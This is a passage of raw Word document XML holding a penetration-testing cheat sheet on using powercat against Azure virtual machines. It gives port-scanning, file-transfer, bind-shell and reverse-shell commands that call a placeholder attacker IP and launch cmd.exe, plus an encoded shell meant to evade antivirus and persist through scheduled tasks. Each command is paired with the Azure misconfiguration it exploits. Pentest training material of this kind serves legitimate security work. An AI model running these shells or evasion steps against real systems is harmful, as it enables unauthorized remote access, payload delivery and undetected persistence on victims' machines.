      </w:r>
    </w:p>
    <w:p w14:paraId="71A35771" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Powercat in Azure External Penetration Testing: Commands, Vulnerabilities, and Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E8FCD" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="493827D3">
          <v:rect id="_x0000_i1170" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF67CB" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Port Scanning to Identify Open Azure VM Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD92B0" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF14FC4" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve">(21,22,80,443) | % { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> -c &lt;Azure_VM_IP&gt; -p $_ -t 1 -Verbose -d }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278DE646" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C7DDA1" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Misconfigured NSGs or Azure Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> allowing inbound traffic to critical ports like SSH (22), RDP (3389), HTTP/S (80/443).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538E26EE" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unrestricted public IP exposure</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> on Azure VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F785035" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it’s used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9A945" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Attackers scan Azure VM’s public IP to identify accessible services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF6F65" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Open ports expose VM to further exploitation (e.g., SSH brute-force, RDP exploits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F1396D" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="0A5C9A6E">
          <v:rect id="_x0000_i1171" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1934EC3B" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. File Transfer to Upload/Download Payloads or Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5760E9" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command (upload file from attacker to Azure VM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D9D71" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> -c &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Attacker_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>&gt; -p &lt;port&gt; -i payload.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FDC6E1" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C35C82" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>lnvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> &lt;port&gt; &gt; payload.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0DEF7" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A366766" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote code execution (RCE) or command injection on Azure VM</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> allows running PowerShell commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64297A56" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lack of endpoint protection</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> or monitoring allows unauthorized file upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26471D9F" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it’s used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11481137" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Transfer malicious scripts or tools to Azure VMs for further exploitation or persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C92427" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="1D9D1A19">
          <v:rect id="_x0000_i1172" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="037CB65A" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Bind Shell to Gain Interactive Shell on Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C476D" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Listener on Azure VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD0B4B" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> -l -p 443 -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CA72F42" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker connects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CCF049" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> &lt;Azure_VM_IP&gt; 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352AFD5B" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4667EC" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote PowerShell execution enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> (e.g., through compromised credentials or misconfigured Azure Run Command).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D96BD" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inbound port open (443 or custom)</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> on Azure VM, allowing connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215C8783" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it’s used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C75E90" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Victim VM opens a shell listener that attacker connects to, providing full command-line access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83C06E" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="2EFEE409">
          <v:rect id="_x0000_i1173" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="657A418E" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Reverse Shell to Bypass Azure NSG Inbound Restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E31DFB2" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Listener on attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5F73D8" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEC30E9" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run on Azure VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D35D6" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> -c &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Attacker_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>&gt; -p 4444 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A70865" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F9C043" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outbound traffic is usually allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> on Azure VMs, even if inbound is restricted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51C5AC" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> to initiate reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1930BA" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it’s used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F0FDC" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>The Azure VM connects outbound to attacker listener, bypassing inbound firewall restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C03EEB" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Attacker gains interactive shell on Azure VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413A8899" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="037EF488">
          <v:rect id="_x0000_i1174" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D973D81" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Standalone &amp; Encoded Shell for Evasion and Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F7B98" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Generate encoded shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D54845" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> -c &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Attacker_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>&gt; -p 4444 -e cmd.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>ge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> &gt; encoded_shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79422E91" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execute encoded shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B017705" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t>powershell -E "&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>encoded_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023FEEE2" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BC1583" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak PowerShell script execution policies</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> set to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>RemoteSigned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> or less restrictive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F923262" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insufficient endpoint detection/prevention</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> allowing encoded or obfuscated scripts to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A3CABE" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it’s used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A5BFA6" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Encoded payloads evade antivirus detection on Azure VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B64156" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Scheduled tasks or Azure Automation can trigger these scripts for persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF547A5" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="3877AEEB">
          <v:rect id="_x0000_i1175" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA891E" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
